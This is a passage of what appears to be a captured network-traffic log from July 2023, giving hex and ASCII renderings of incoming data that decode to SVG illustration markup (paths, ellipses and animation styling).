                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6869INData Raw: 35 2e 38 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 41 32 2c 32 2c 30 2c 30 2c 31 2c 34 31 35 2c 31 32 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 31 35 2e 32 37 2c 31 31 39 2e 33 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32
                                                                                                                                                                                                                                                  Data Ascii: 5.82a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0A2,2,0,0,1,415,127"/><path class="cls-9" d="M415.27,119.34a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.7,0,2,2
                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6885INData Raw: 34 34 32 2e 39 33 2c 31 35 37 2e 33 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 34 32 2e 37 31 2c 31 35 30 2e 38 36 41 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2c 34 34 32 2c 31 35 33 61 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c
                                                                                                                                                                                                                                                  Data Ascii: 442.93,157.34a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M442.71,150.86A1.61,1.61,0,0,1,442,153a2.35,2.35,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.7,2.1,2.1,0,0,1,
                                                                                                                                                                                                                                                  2023-07-27 19:54:38 UTC6901INData Raw: 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 37 30 2e 33 37 2c 31 38 38 2e 38 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 37 30 2e 31 35 2c 31 38 32 2e 33 38 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e
                                                                                                                                                                                                                                                  Data Ascii: class="cls-9" d="M470.37,188.86a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.7,2.09,2.09,0,0,1,2.7,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M470.15,182.38a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.
                                                                                                                                                                                                                                                  2023-07-27 19:54:38 UTC6917INData Raw: 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 35 2e 30 38 2c 33 39 2e 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 34 2e 38 36 2c 33 32 2e 36 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30
                                                                                                                                                                                                                                                  Data Ascii: 1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M485.08,39.1a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M484.86,32.62a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0
                                                                                                                                                                                                                                                  2023-07-27 19:54:38 UTC6933INData Raw: 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2e 35 32 2c 37 30 2e 36 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2e 33 2c 36 34 2e 31 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e
                                                                                                                                                                                                                                                  Data Ascii: ,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M512.52,70.62a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M512.3,64.14a1.61,1.61,0,0,1-.73,2.09,2.
                                                                                                                                                                                                                                                  2023-07-27 19:54:38 UTC6949INData Raw: 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 30 2c 31 30 32 2e 31 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 33 39 2e 37 34 2c 39 35 2e 36 36 61 31 2e 36 31 2c 31 2e 36
                                                                                                                                                                                                                                                  Data Ascii: ,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M540,102.14a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M539.74,95.66a1.61,1.6
                                                                                                                                                                                                                                                  2023-07-27 19:54:38 UTC6965INData Raw: 39 2e 30 36 2d 34 2e 38 33 2c 32 2e 38 34 2d 31 33 36 2e 33 2d 32 2e 35 31 2d 31 34 31 2e 38 37 2d 32 2e 31 37 6c 2d 38 33 2e 37 31 2c 35 63 2d 31 2e 38 37 2e 31 32 2d 33 32 2c 31 2e 31 36 2d 33 32 2e 31 33 2c 31 2e 39 34 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 36 22 20 64 3d 22 4d 39 30 30 2e 31 36 2c 31 37 34 6c 34 2e 33 34 2d 35 2e 36 33 2c 32 2e 34 31 2d 33 30 2e 32 36 2d 32 33 2e 36 39 2c 31 34 2e 34 35 63 2d 34 2e 39 34 2c 33 2d 39 2e 38 35 2c 36 2e 31 32 2d 31 34 2e 38 34 2c 39 2e 30 36 2d 34 2e 38 33 2c 32 2e 38 34 2d 31 33 36 2e 33 2d 32 2e 35 31 2d 31 34 31 2e 38 37 2d 32 2e 31 37 6c 2d 38 33 2e 37 31 2c 35 63 2d 31 2e 38 37 2e 31 32 2d 33 32 2c 31 2e 31 36 2d 33 32 2e 31 33 2c 31 2e 39 34 6c 2d 2e 33 39 2c 34 4c 36 31
                                                                                                                                                                                                                                                  Data Ascii: 9.06-4.83,2.84-136.3-2.51-141.87-2.17l-83.71,5c-1.87.12-32,1.16-32.13,1.94Z"/><path class="cls-16" d="M900.16,174l4.34-5.63,2.41-30.26-23.69,14.45c-4.94,3-9.85,6.12-14.84,9.06-4.83,2.84-136.3-2.51-141.87-2.17l-83.71,5c-1.87.12-32,1.16-32.13,1.94l-.39,4L61
                                                                                                                                                                                                                                                  2023-07-27 19:54:38 UTC6981INData Raw: 2e 34 35 2c 31 2e 39 34 2c 31 2e 39 34 2c 30 2c 30 2c 30 2c 2e 33 37 2d 2e 36 36 41 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 30 2c 35 32 30 2e 33 34 2c 32 32 39 2e 30 35 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 32 22 20 64 3d 22 4d 35 32 34 2c 32 32 36 2e 32 32 71 30 2c 2e 32 31 2c 30 2c 2e 34 38 63 30 2c 2e 31 38 2c 30 2c 2e 33 33 2c 30 2c 2e 34 35 68 30 61 31 2e 36 36 2c 31 2e 36 36 2c 30 2c 30 2c 31 2c 2e 32 39 2d 2e 34 32 2c 32 2e 30 36 2c 32 2e 30 36 2c 30 2c 30 2c 31 2c 2e 34 33 2d 2e 33 35 2c 32 2e 33 32 2c 32 2e 33 32 2c 30 2c 30 2c 31 2c 2e 35 33 2d 2e 32 34 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2c 2e 36 2d 2e 30 38 2c 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2c 31 2c 2e 31 39 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 36
                                                                                                                                                                                                                                                  Data Ascii: .45,1.94,1.94,0,0,0,.37-.66A2.5,2.5,0,0,0,520.34,229.05Z"/><path class="cls-2" d="M524,226.22q0,.21,0,.48c0,.18,0,.33,0,.45h0a1.66,1.66,0,0,1,.29-.42,2.06,2.06,0,0,1,.43-.35,2.32,2.32,0,0,1,.53-.24,2.35,2.35,0,0,1,.6-.08,2.15,2.15,0,0,1,1,.19,2,2,0,0,1,.6
                                                                                                                                                                                                                                                  2023-07-27 19:54:38 UTC6997INData Raw: 79 32 3d 22 33 32 34 2e 32 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 36 22 20 64 3d 22 4d 36 36 39 2e 31 39 2c 33 31 33 2e 33 34 76 32 63 30 2c 31 2e 33 36 2c 33 2e 32 33 2c 32 2e 34 36 2c 37 2e 32 31 2c 32 2e 34 36 73 37 2e 32 31 2d 31 2e 31 2c 37 2e 32 31 2d 32 2e 34 36 76 2d 32 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 36 37 36 2e 34 22 20 63 79 3d 22 33 31 33 2e 33 34 22 20 72 78 3d 22 37 2e 32 31 22 20 72 79 3d 22 32 2e 34 35 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 70 6f 69 6e 74 73 3d 22 36 36 38 2e 31 35 20 33 33 31 2e 34 38 20 36 36 34 2e 37 33 20 33 32 39 2e 31 35 20 36 36 34 2e 39 33 20 33 31 37 2e 37 34 20 36 36 38 2e 34 20 33 31
                                                                                                                                                                                                                                                  Data Ascii: y2="324.26"/><path class="cls-76" d="M669.19,313.34v2c0,1.36,3.23,2.46,7.21,2.46s7.21-1.1,7.21-2.46v-2"/><ellipse class="cls-38" cx="676.4" cy="313.34" rx="7.21" ry="2.45"/><polygon class="cls-38" points="668.15 331.48 664.73 329.15 664.93 317.74 668.4 31
                                                                                                                                                                                                                                                  2023-07-27 19:54:38 UTC7013INData Raw: 20 35 36 38 2e 37 35 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 37 22 20 63 78 3d 22 38 34 38 2e 36 34 22 20 63 79 3d 22 32 31 38 2e 37 34 22 20 72 78 3d 22 32 2e 32 34 22 20 72 79 3d 22 32 2e 38 38 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 35 2e 36 39 20 35 36 39 2e 38 38 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 37 22 20 63 78 3d 22 38 34 38 2e 36 34 22 20 63 79 3d 22 32 31 38 2e 37 34 22 20 72 78 3d 22 31 2e 36 22 20 72 79 3d 22 32 2e 30 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 35 2e 36 39 20 35 36 39 2e 38 38 29 20 72 6f 74 61 74 65 28
                                                                                                                                                                                                                                                  Data Ascii: 568.75) rotate(-38.07)"/><ellipse class="cls-97" cx="848.64" cy="218.74" rx="2.24" ry="2.88" transform="translate(45.69 569.88) rotate(-38.07)"/><ellipse class="cls-97" cx="848.64" cy="218.74" rx="1.6" ry="2.05" transform="translate(45.69 569.88) rotate(
                                                                                                                                                                                                                                                  2023-07-27 19:54:38 UTC7029INData Raw: 33 34 63 30 2d 2e 30 35 2d 2e 32 38 2d 2e 32 35 2d 2e 33 32 2d 2e 33 61 2e 33 2e 33 2c 30 2c 30 2c 31 2d 2e 30 39 2d 2e 32 33 2e 33 32 2e 33 32 2c 30 2c 30 2c 31 2c 2e 33 33 2d 2e 33 33 43 38 31 35 2e 32 36 2c 32 35 30 2e 31 34 2c 38 31 35 2e 33 34 2c 32 35 30 2e 31 38 2c 38 31 35 2e 36 2c 32 35 30 2e 33 39 5a 6d 31 2e 31 37 2e 34 36 61 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 32 33 2e 36 36 63 30 2c 2e 32 31 2d 2e 32 31 2e 32 38 2d 2e 34 32 2e 32 32 73 2d 2e 31 37 2d 2e 30 38 2d 2e 33 33 2d 2e 34 37 6c 2d 2e 31 36 2d 2e 33 37 61 2e 33 35 2e 33 35 2c 30 2c 30 2c 31 2c 30 2d 2e 31 34 63 30 2d 2e 32 34 2e 32 33 2d 2e 32 36 2e 33 36 2d 2e 32 35 53 38 31 36 2e 36 35 2c 32 35 30 2e 35 39 2c 38 31 36 2e 37 37 2c 32 35 30 2e 38 35 5a 6d 2e 34 35 2e 30
                                                                                                                                                                                                                                                  Data Ascii: 34c0-.05-.28-.25-.32-.3a.3.3,0,0,1-.09-.23.32.32,0,0,1,.33-.33C815.26,250.14,815.34,250.18,815.6,250.39Zm1.17.46a2.37,2.37,0,0,1,.23.66c0,.21-.21.28-.42.22s-.17-.08-.33-.47l-.16-.37a.35.35,0,0,1,0-.14c0-.24.23-.26.36-.25S816.65,250.59,816.77,250.85Zm.45.0
                                                                                                                                                                                                                                                  2023-07-27 19:54:38 UTC7045INData Raw: 2c 32 38 34 2e 39 31 5a 22 2f 3e 3c 72 65 63 74 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 31 33 22 20 78 3d 22 39 33 30 2e 31 36 22 20 79 3d 22 32 38 35 2e 32 39 22 20 77 69 64 74 68 3d 22 33 2e 37 35 22 20 68 65 69 67 68 74 3d 22 33 2e 31 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 38 36 34 2e 30 36 20 35 37 33 2e 36 37 29 20 72 6f 74 61 74 65 28 2d 31 38 30 29 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 31 34 22 20 64 3d 22 4d 39 33 33 2e 37 32 2c 32 39 35 2e 38 33 61 33 31 2e 37 31 2c 33 31 2e 37 31 2c 30 2c 30 2c 31 2d 36 2e 32 2e 35 31 2c 33 32 2e 34 33 2c 33 32 2e 34 33 2c 30 2c 30 2c 31 2d 36 2e 32 34 2d 2e 35 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 31 35 22 20 64 3d 22 4d 39 33
                                                                                                                                                                                                                                                  Data Ascii: ,284.91Z"/><rect class="cls-113" x="930.16" y="285.29" width="3.75" height="3.1" transform="translate(1864.06 573.67) rotate(-180)"/><path class="cls-114" d="M933.72,295.83a31.71,31.71,0,0,1-6.2.51,32.43,32.43,0,0,1-6.24-.51"/><path class="cls-115" d="M93
                                                                                                                                                                                                                                                  2023-07-27 19:54:38 UTC7061INData Raw: 30 2c 30 2c 30 2c 2e 37 36 2e 36 2c 36 2e 35 38 2c 36 2e 35 38 2c 30 2c 30 2c 30 2c 32 2e 33 35 2c 31 2e 30 37 2c 37 2e 32 38 2c 37 2e 32 38 2c 30 2c 30 2c 30 2c 32 2e 33 37 2d 2e 30 39 6c 31 2e 38 37 2d 2e 32 37 61 35 2e 32 34 2c 35 2e 32 34 2c 30 2c 30 2c 30 2c 32 2e 35 38 2d 2e 38 35 41 32 2e 39 31 2c 32 2e 39 31 2c 30 2c 30 2c 30 2c 39 30 35 2e 35 37 2c 32 35 33 2e 35 32 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 33 34 22 20 64 3d 22 4d 38 39 36 2e 39 32 2c 32 34 36 2e 37 33 61 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 37 34 2d 2e 35 35 63 30 2d 2e 34 32 2e 32 37 2d 2e 37 39 2e 32 32 2d 31 2e 32 32 61 36 2e 34 38 2c 36 2e 34 38 2c 30 2c 30 2c 31 2c 32 2e 33 32 2d 2e 30 35 63 2d 2e 35 38 2e 39 34 2e 33 34 2c 32 2e 31 2c
                                                                                                                                                                                                                                                  Data Ascii: 0,0,0,.76.6,6.58,6.58,0,0,0,2.35,1.07,7.28,7.28,0,0,0,2.37-.09l1.87-.27a5.24,5.24,0,0,0,2.58-.85A2.91,2.91,0,0,0,905.57,253.52Z"/><path class="cls-134" d="M896.92,246.73a2.36,2.36,0,0,1,.74-.55c0-.42.27-.79.22-1.22a6.48,6.48,0,0,1,2.32-.05c-.58.94.34,2.1,
                                                                                                                                                                                                                                                  2023-07-27 19:54:38 UTC7077INData Raw: 36 37 2c 34 2e 37 36 2e 36 36 2c 37 2e 32 61 31 30 2e 36 34 2c 31 30 2e 36 34 2c 30 2c 30 2c 31 2d 32 2d 2e 31 38 2c 39 2c 39 2c 30 2c 30 2c 31 2d 31 2e 31 33 2d 2e 33 31 63 2d 2e 32 32 2d 2e 30 35 2d 31 2e 32 36 2d 2e 34 35 2d 31 2e 34 35 2d 2e 33 73 2e 31 38 2e 37 2e 33 32 2e 38 39 63 2e 32 36 2e 33 37 2e 33 34 2e 34 36 2e 32 33 2e 39 61 2e 38 33 2e 38 33 2c 30 2c 30 2c 31 2d 2e 35 31 2e 36 38 63 2d 2e 31 33 2e 30 36 2d 2e 38 36 2e 32 32 2d 31 2c 2e 31 33 2c 31 2e 32 34 2c 31 2e 31 39 2c 33 2e 32 36 2c 31 2c 34 2e 38 36 2c 31 2e 32 6c 32 2e 34 33 2e 32 34 63 2e 36 2e 30 36 2c 31 2e 31 37 2e 31 33 2c 31 2e 34 35 2d 2e 35 34 61 33 2e 38 37 2c 33 2e 38 37 2c 30 2c 30 2c 30 2c 2e 31 32 2d 31 2e 33 31 63 30 2d 31 2d 2e 31 36 2d 32 2d 2e 32 2d 33 43 38 32 37
                                                                                                                                                                                                                                                  Data Ascii: 67,4.76.66,7.2a10.64,10.64,0,0,1-2-.18,9,9,0,0,1-1.13-.31c-.22-.05-1.26-.45-1.45-.3s.18.7.32.89c.26.37.34.46.23.9a.83.83,0,0,1-.51.68c-.13.06-.86.22-1,.13,1.24,1.19,3.26,1,4.86,1.2l2.43.24c.6.06,1.17.13,1.45-.54a3.87,3.87,0,0,0,.12-1.31c0-1-.16-2-.2-3C827
                                                                                                                                                                                                                                                  2023-07-27 19:54:38 UTC7093INData Raw: 2d 33 2d 31 33 2e 35 2d 33 6c 2d 33 30 2e 36 39 2d 33 2e 35 37 63 2d 31 2e 32 34 2d 2e 30 38 2d 34 2d 34 2d 34 2e 38 33 2d 34 2e 39 61 34 33 2e 30 37 2c 34 33 2e 30 37 2c 30 2c 30 2c 30 2d 34 2e 31 37 2d 33 2e 39 35 63 2d 32 2e 30 36 2d 31 2e 37 36 2d 33 2e 39 34 2d 33 2e 38 2d 35 2e 38 39 2d 35 2e 36 38 6c 2d 31 30 2d 39 2e 36 34 63 2d 36 2e 33 36 2d 31 2e 35 36 2d 31 32 2e 37 36 2d 33 2d 31 39 2e 31 32 2d 34 2e 35 36 2d 34 2e 33 35 2d 31 2e 30 38 2d 38 2e 37 34 2d 36 2e 31 33 2d 31 32 2e 38 36 2d 37 2e 38 31 2d 31 2e 32 33 2d 35 2e 31 34 2d 31 2e 35 38 2d 39 2d 33 2e 39 35 2d 31 37 2e 34 38 2d 2e 30 36 2d 2e 32 32 2c 31 2e 32 32 2d 39 2c 31 2e 36 38 2d 39 2c 31 32 2e 30 39 2e 31 34 2c 32 31 2c 2e 35 36 2c 33 33 2c 2e 36 35 2c 32 33 2c 2e 31 38 2c 34 35
                                                                                                                                                                                                                                                  Data Ascii: -3-13.5-3l-30.69-3.57c-1.24-.08-4-4-4.83-4.9a43.07,43.07,0,0,0-4.17-3.95c-2.06-1.76-3.94-3.8-5.89-5.68l-10-9.64c-6.36-1.56-12.76-3-19.12-4.56-4.35-1.08-8.74-6.13-12.86-7.81-1.23-5.14-1.58-9-3.95-17.48-.06-.22,1.22-9,1.68-9,12.09.14,21,.56,33,.65,23,.18,45
                                                                                                                                                                                                                                                  2023-07-27 19:54:38 UTC7109INData Raw: 72 79 3d 22 30 2e 31 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 37 20 35 36 33 2e 36 34 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 34 30 2e 36 39 22 20 63 79 3d 22 32 31 34 2e 30 39 22 20 72 78 3d 22 30 2e 31 35 22 20 72 79 3d 22 30 2e 31 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 36 2e 38 36 20 35 36 33 2e 39 39 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 33 39 2e 30 38 22 20 63 79 3d 22 32 31 34 2e 30 35 22 20 72 78 3d 22 30 2e 31 35 22 20
                                                                                                                                                                                                                                                  Data Ascii: ry="0.19" transform="translate(47 563.64) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="840.69" cy="214.09" rx="0.15" ry="0.19" transform="translate(46.86 563.99) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="839.08" cy="214.05" rx="0.15"
                                                                                                                                                                                                                                                  2023-07-27 19:54:38 UTC7125INData Raw: 63 79 3d 22 32 33 33 2e 36 37 22 20 72 78 3d 22 30 2e 31 37 22 20 72 79 3d 22 30 2e 32 32 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 32 38 2e 37 38 20 35 35 30 2e 37 36 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 31 32 2e 39 38 22 20 63 79 3d 22 32 33 34 2e 30 39 22 20 72 78 3d 22 30 2e 31 37 22 20 72 79 3d 22 30 2e 32 32 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 32 38 2e 36 33 20 35 35 31 2e 31 35 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 31 33 2e 34
                                                                                                                                                                                                                                                  Data Ascii: cy="233.67" rx="0.17" ry="0.22" transform="translate(28.78 550.76) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="812.98" cy="234.09" rx="0.17" ry="0.22" transform="translate(28.63 551.15) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="813.4
                                                                                                                                                                                                                                                  2023-07-27 19:54:38 UTC7141INData Raw: 73 20 31 20 6e 6f 72 6d 61 6c 20 6e 6f 6e 65 20 72 75 6e 6e 69 6e 67 3b 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 20 73 76 67 2d 61 6e 69 6d 22 20 64 3d 22 4d 38 30 38 2e 38 35 2c 32 38 31 2e 37 37 61 31 2e 38 35 2c 31 2e 38 35 2c 30 2c 30 2c 31 2c 2e 31 31 2d 2e 33 31 63 2d 2e 33 31 2e 36 37 2d 31 2c 31 2d 31 2e 30 39 2c 31 2e 37 38 61 31 31 2c 31 31 2c 30 2c 30 2c 30 2d 2e 31 35 2c 31 2e 31 35 63 30 2c 2e 34 34 2e 32 2e 36 32 2e 33 31 2c 31 2c 2e 32 32 2e 37 34 2d 2e 31 37 2c 31 2e 37 35 2d 31 2e 30 37 2c 31 2e 34 35 2d 2e 36 39 2d 2e 32 33 2d 31 2e 31 2d 31 2d 31 2e 36 2d 31 2e 34 35 61 31 31 2e 37 36 2c 31 31 2e 37 36 2c 30 